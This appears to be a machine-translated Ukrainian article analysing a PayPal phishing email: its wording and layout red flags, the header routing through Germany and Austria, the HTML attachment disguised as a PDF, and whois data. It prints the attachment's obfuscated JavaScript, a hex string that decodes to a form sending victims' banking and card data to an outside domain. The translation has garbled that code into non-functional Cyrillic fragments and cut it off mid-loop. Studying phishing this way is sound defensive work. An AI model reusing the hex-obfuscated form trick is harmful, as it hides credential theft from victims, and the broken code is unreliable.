loader

Онлайн-безпека: порушення анатомії фішингової електронної пошти

Anonim


У сучасному світі, де інформація кожного доступна в Інтернеті, фішинг є однією з найпопулярніших і руйнівних онлайнових атак, тому що ви завжди можете очистити вірус, але якщо ваші банківські реквізити викрадені, у вас виникли проблеми. Ось розбивка однієї такої атаки, яку ми отримали.

Не думайте, що важливі лише ваші банківські реквізити: врешті-решт, якщо хтось отримує контроль над входом вашого облікового запису, вони не тільки знають інформацію, що міститься в цьому обліковому записі, але ймовірність того, що таку ж реєстраційну інформацію можна використовувати для інших рахунків. Якщо вони порушують ваш обліковий запис електронної пошти, вони можуть скинути всі інші паролі.

Таким чином, на додаток до збереження сильних і змінних паролів, ви завжди повинні знаходитися в пошуках фіктивних листів, які маскуються як справжні речі. Хоча більшість спроб фішингу є аматорськими, деякі з них досить переконливі, тому важливо зрозуміти, як їх розпізнати на поверхневому рівні, а також як вони працюють під капотом.

Дослідження Що таке в простому погляді

Наші приклади електронної пошти, як і більшість спроб фішингу, "сповіщають" вас про діяльність на вашому обліковому записі PayPal, який за нормальних обставин буде тривожним. Таким чином, заклик до дії - це перевірка / відновлення облікового запису, подавши майже кожну частину особистої інформації, яку ви можете придумати. Знову ж таки, це досить формулично.

Хоча, безумовно, є винятки, майже кожна фішингова та шахрайська електронна пошта завантажується червоними прапорцями безпосередньо в самі повідомлення. Навіть якщо текст є переконливим, зазвичай можна знайти багато помилок, що виникли в тілі повідомлення, що вказує на те, що повідомлення не є законним.

Тіло повідомлення

На перший погляд, це одна з кращих фішингових листів, які я бачив. Немає жодних орфографічних або граматичних помилок, а слово «словослів» читається відповідно до того, що можна очікувати. Проте є кілька червоних прапорів, які ви можете побачити, коли ви вивчаєте вміст трохи більш уважно.

  • “Paypal” - Правильний випадок “PayPal” (капітал P). Можна побачити обидві варіанти, які використовуються в повідомленні. Компанії дуже продумані своїми брендами, тому сумнівно, що подібне може пройти процес перевірки.
  • "Дозволити ActiveX" - Скільки разів ви бачили легальний веб-бізнес розміром Paypal, використовуючи власний компонент, який працює тільки на одному браузері, особливо коли вони підтримують кілька браузерів? Звичайно, десь там робиться компанія, але це червоний прапор.
  • - Зверніть увагу на те, як це слово не розташовується в полі з рештою тексту абзацу. Навіть якщо я розтягую вікно трохи більше, він не обертається або простору не правильно.
  • "Paypal!" - Простір перед знаком оклику виглядає незручно. Просто ще одна примха, яку я впевнений, не буде в легальній пошті.
  • "PayPal-Обновлення облікового запису Form.pdf.htm" - Чому б Paypal приєднати "PDF", особливо коли вони могли б просто посилатися на сторінку на своєму сайті? Крім того, чому вони намагаються замаскувати HTML-файл як PDF? Це найбільший червоний прапор усіх.

Заголовок повідомлення

Коли ви подивитеся на заголовок повідомлення, з'являються кілька червоних прапорів:

  • Адреса від
  • Відсутня адреса. Я не відмітив це, це просто не є частиною стандартного заголовка повідомлення. Як правило, компанія, яка має ваше ім'я, персоналізуватиме вам електронну пошту.

Додаток

Коли я відкриваю вкладення, ви можете відразу побачити, що макет не є правильним, оскільки в ньому відсутня інформація про стиль. Знову ж таки, чому б PayPal надсилав електронну форму HTML, коли вони могли просто дати вам посилання на своєму сайті?

Примітка: для цього ми використовували вбудований у Gmail переглядач вкладень HTML, але рекомендуємо, щоб ви не відкривали вкладення від шахраїв. Ніколи. Ніколи. Вони дуже часто містять подвиги, які будуть встановлювати трояни на вашому комп'ютері, щоб вкрасти інформацію про ваш обліковий запис.

Прокручуючи трохи більше, ви бачите, що ця форма вимагає не тільки для реєстраційної інформації PayPal, але й для банківських та кредитних карт. Деякі зображення розбиті.

Очевидно, що ця спроба фішингу йде після всього одного.

Технічний злам

Хоча це повинно бути чітко, виходячи з того, що це зрозуміло, що це спроба фішингу, ми тепер збираємося зруйнувати технічний склад електронної пошти і подивитися, що ми можемо знайти.

Інформація з додатку

Перше, на що слід звернути увагу - це HTML-джерело форми вкладень, яка передає дані на підроблений сайт.

При швидкому перегляді джерела всі посилання стають дійсними, оскільки вони вказують на "paypal.com" або "paypalobjects.com", які є обома законними.

Тепер ми подивимося на деякі основні сторінки, які Firefox збирає на сторінці.

Як ви можете бачити, деякі графіки витягуються з доменів “blessedtobe.com”, “goodhealthpharmacy.com” та “pic-upload.de” замість легітимних доменів PayPal.

Інформація з заголовків електронної пошти

Далі ми розглянемо сирі заголовки повідомлень електронної пошти. Gmail робить це доступним за допомогою пункту меню "Показати оригінал" у повідомленні.

Дивлячись на інформацію заголовка для початкового повідомлення, ви бачите, що це повідомлення складається за допомогою Outlook Express 6. Я сумніваюся, що у PayPal є хтось із співробітників, який надсилає кожне з цих повідомлень вручну через застарілий поштовий клієнт.

Розглядаючи інформацію про маршрутизацію, ми можемо побачити IP-адресу відправника та поштового сервера-ретранслятора.

IP-адреса користувача є оригінальним відправником. Здійснюючи швидкий пошук інформації про ІР, ми бачимо, що IP-адреса відправляється в Німеччині.

І коли ми дивимося на ретрансляційний поштовий сервер (mail.itak.at), IP-адресу ми бачимо, це провайдер, заснований в Австрії. Я сумніваюся, що PayPal направляє їхні електронні листи безпосередньо через провайдера на основі Австрії, коли у них є масивна серверна ферма, яка може легко вирішити це завдання.

Де йдуть дані?

Таким чином, ми чітко визначили, що це фішингове електронне повідомлення та зібрано деяку інформацію про те, звідки походить повідомлення, але як щодо того, де надсилаються ваші дані?

Щоб побачити це, ми повинні спочатку зберегти вкладення HTM на наш робочий стіл і відкрити в текстовому редакторі. Прокручуючи його, все виглядає в порядку, за винятком випадків, коли ми переходимо до підозрілого блоку Javascript.

Видалення повного джерела останнього блоку Javascript, ми бачимо:


// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
вар я, у, х = »3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»; у = »; для (I = 0; я

У будь-який час ви бачите величезний рядок з начебто випадкових букв і цифр, вбудованих у блок Javascript, зазвичай це щось підозріле. Дивлячись на код, змінна “x” встановлюється на цю велику рядок і потім декодується в змінну “y”. Остаточний результат змінної «y» записується у документ як HTML.

Оскільки велика рядок складається з чисел 0-9, а літери af, швидше за все, кодуються за допомогою простого перетворення ASCII-Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Перекладає на:

Це не випадково, що це розшифровується у дійсний HTML-тег форми, який посилає результати не до PayPal, а до шахрайського сайту.

Крім того, коли ви переглядаєте HTML-код форми, ви побачите, що цей тег форми не видно, оскільки він генерується динамічно через Javascript. Це розумний спосіб приховати те, що HTML дійсно робить, якщо хтось просто переглядає згенерований джерело вкладення (як ми це робили раніше), а не відкриття вкладення безпосередньо в текстовому редакторі.

Запускаючи швидкий whois на сайті, який ображає, ми бачимо, що це домен, розміщений на популярному веб-хості, 1and1.

Що виділяється, домен використовує читається ім'я (на відміну від щось на кшталт "dfh3sjhskjhw.net") і домен був зареєстрований протягом 4 років. Через це, я вважаю, що цей домен був захоплений і використаний як пішак у цій спробі фішингу.

Цинізм - хороша оборона

Коли мова йде про безпеку в Інтернеті, ніколи не завадить мати хороший цинізм.

Хоча я впевнений, що в наведеному прикладі електронної пошти є більше червоних прапорців, те, що ми вказали вище, є показниками, які ми бачили після кількох хвилин експертизи. Гіпотетично, якщо поверхневий рівень електронної пошти імітував його легальний аналог 100%, технічний аналіз все одно виявить його справжню природу. Ось чому це імпортувати, щоб мати можливість вивчити і те, що ви можете і не можете бачити.